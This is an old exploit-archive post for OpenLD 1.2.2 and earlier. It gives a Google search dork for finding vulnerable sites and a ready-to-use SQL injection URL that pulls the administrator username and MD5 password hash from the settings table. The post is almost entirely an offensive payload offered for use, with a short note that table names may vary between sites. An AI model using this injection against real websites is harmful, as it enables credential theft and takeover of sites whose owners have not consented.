24 lines
No EOL
966 B
Text
24 lines
No EOL
966 B
Text
--==+================================================================================+==--
|
|
--==+ OpenLD <= 1.2.2 SQL Injection Exploit +==--
|
|
--==+================================================================================+==--
|
|
DISCOVERED BY: Cody "CypherXero" Rester
|
|
PAYLOAD: Admin username and MD5 Hash
|
|
WEBSITE: http://www.cypherxero.net
|
|
|
|
Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
|
|
--==+================================================================================+==--
|
|
|
|
NOTES:
|
|
|
|
The table names may have an extension that is unique to the website. The standard table name
|
|
is "settings", but may be "openld_settngs" or possibly the name of the site.
|
|
|
|
DORK:
|
|
|
|
"Powered by OpenLD"
|
|
|
|
EXPLOITS:
|
|
|
|
http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--
|
|
|
|
# milw0rm.com [2007-07-10] |